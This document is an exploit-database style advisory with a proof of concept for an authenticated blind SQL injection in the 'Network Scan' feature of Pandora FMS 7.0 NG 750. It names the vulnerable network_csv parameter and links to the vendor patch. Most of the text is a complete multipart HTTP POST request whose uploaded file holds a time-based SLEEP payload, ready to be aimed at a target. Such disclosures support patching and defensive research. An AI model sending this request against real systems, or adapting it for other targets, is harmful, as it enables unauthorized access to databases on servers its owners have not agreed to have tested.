Pandora FMS version 7.0 NG 750 suffers from a remote authenticated SQL injection vulnerability.
57657a8a947a5ce728a1f0cc1a58159b
# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
# Date: 12-21-2020
# Exploit Author: Matthew Aberegg, Alex Prieto
# Vendor Homepage: https://pandorafms.com/
# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
# Software Link: https://pandorafms.com/community/get-started/
# Version: Pandora FMS 7.0 NG 750
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
# Vulnerable Parameter : network_csv
# POC
POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
Content-Length: 1597
Origin: http://TARGET
Connection: close
Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
Upgrade-Insecure-Requests: 1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_manual_defined"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_select"
300
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_text"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval"
0
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="interval_units"
1
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="taskname"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="id_recon_server"
3
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv_enabled"
on
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network_csv"; filename="test.txt"
Content-Type: text/plain
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="network"
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="comment"
test
-----------------------------308827614039434535382911921119
Content-Disposition: form-data; name="submit"
Next
-----------------------------308827614039434535382911921119--